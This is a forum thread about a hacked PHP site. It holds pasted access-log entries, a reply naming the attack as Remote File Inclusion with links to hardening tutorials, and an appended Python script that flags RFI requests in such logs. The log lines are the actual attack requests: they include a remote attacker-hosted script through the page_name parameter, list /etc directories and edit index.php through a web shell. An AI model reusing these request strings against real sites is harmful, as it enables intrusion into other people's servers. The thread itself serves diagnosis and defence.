Http Code: 200 	Date: Dec 06 07:20:51 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=f&f=index.php&ft=edit&am
Http Code: 200 	Date: Dec 06 07:21:37 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/
Http Code: 200 	Date: Dec 06 07:22:19 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: -
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1





    *  


/favicon.ico
Http Code: 404 	Date: Dec 06 07:22:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: -
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1





    *  


/index.php?page_name=http://freewebs.com/xugurx/ugur.txt?
Http Code: 200 	Date: Dec 06 07:23:27 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)


> Do you think this is the way the website got hacked?

 

That's quite likely. The script at the end of that URL seems to be a rootkit. That vulnerability is called RFI (Remote File Inclusion).

 

> Can anyone tell me how to fix this (apart from the obvious filtering the input to make sure that it is only alpha-numerical)?

 

Not without having access to the code.

 

> Could you also recommend me a good tutorial/book on php/web security

 

You may check out some of the tutorials we have here on PHP Freaks:

http://www.phpfreaks.com/tutorial/php-security

http://www.phpfreaks.com/tutorial/preventing-remote-file-include-attacks-with-mod-rewrite

http://www.phpfreaks.com/tutorial/hardening-php-with-suhosin

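A triage pass over the log layout shown in the first post, flagging any request whose query string or Referer carries a parameter whose decoded value is itself a URL, the pattern the reply names as RFI. This is an added example and not part of the original thread; it checks every parameter rather than only `page_name`, and the function names and the `rfi-request` / `rfi-referer` tags are made up for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Five records excerpted from the log in the post (whitespace normalised).
SAMPLE_LOG = """\
/index.php?page_name=Fundraising
Http Code: 200  Date: Dec 06 07:07:30  Http Version: HTTP/1.1  Size in Bytes: 15749
Referer: http://www.google.com.tr/search?hl=tr&q=%22Failed+Opening%22inurl%3A%3D%22citizens%22&
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

/index.php?act=ls&d=%2Fetc%2Fvdomainaliases%2F
Http Code: 200  Date: Dec 06 07:15:37  Http Version: HTTP/1.1  Size in Bytes: 18328
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=f&f=index.php&ft=edit&am
Http Code: 200  Date: Dec 06 07:19:20  Http Version: HTTP/1.1  Size in Bytes: 53061
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

/back/images/vietnam.jpg
Http Code: 206  Date: Dec 06 07:20:00  Http Version: HTTP/1.1  Size in Bytes: 203714
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

/index.php?page_name=http://freewebs.com/xugurx/ugur.txt?
Http Code: 200  Date: Dec 06 07:23:27  Http Version: HTTP/1.1  Size in Bytes: 90
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
"""

STATUS_RE = re.compile(
    r"Http Code:\s*(\d+)\s+Date:\s*(.+?)\s+Http Version:\s*\S+\s+Size in Bytes:\s*(\S+)"
)
# A decoded parameter value that starts with "scheme://" (http, ftp, php, data, ...).
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def parse_records(text):
    """Split the control-panel style log into one dict per request."""
    records, current = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("/"):                 # request line opens a new record
            current = {"path": line, "status": None, "time": None,
                       "size": None, "referer": "-"}
            records.append(current)
        elif current is None:
            continue                             # header lines before the first record
        elif line.startswith("Referer:"):
            current["referer"] = line[len("Referer:"):].strip()
        else:
            m = STATUS_RE.match(line)
            if m:
                current["status"] = int(m.group(1))
                current["time"] = m.group(2)
                current["size"] = None if m.group(3) == "-" else int(m.group(3))
    return records


def remote_params(url):
    """Return {param: decoded value} for query parameters whose value is a URL."""
    query = urlsplit(url).query                  # parse_qs undoes %3A%2F%2F encoding
    return {k: v for k, vals in parse_qs(query).items()
            for v in vals if SCHEME_RE.match(v)}


def classify(rec):
    tags = []
    if remote_params(rec["path"]):
        tags.append("rfi-request")               # the request itself pulls in a remote file
    if remote_params(rec["referer"]):
        tags.append("rfi-referer")               # issued from a page rendered by such a request
    return tags


def triage(text):
    """Return (time, status, size, tags, path) for every record tied to a remote include."""
    hits = []
    for rec in parse_records(text):
        tags = classify(rec)
        if tags:
            hits.append((rec["time"], rec["status"], rec["size"], tags, rec["path"]))
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(*hit, sep=" | ")
```

`parse_records` ignores the `*` bullets, the `Host:` line and blank lines, so the log can be fed in as pasted. A parameter that legitimately carries a URL (a redirect target, for instance) is flagged too, so hits are leads for review rather than verdicts.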
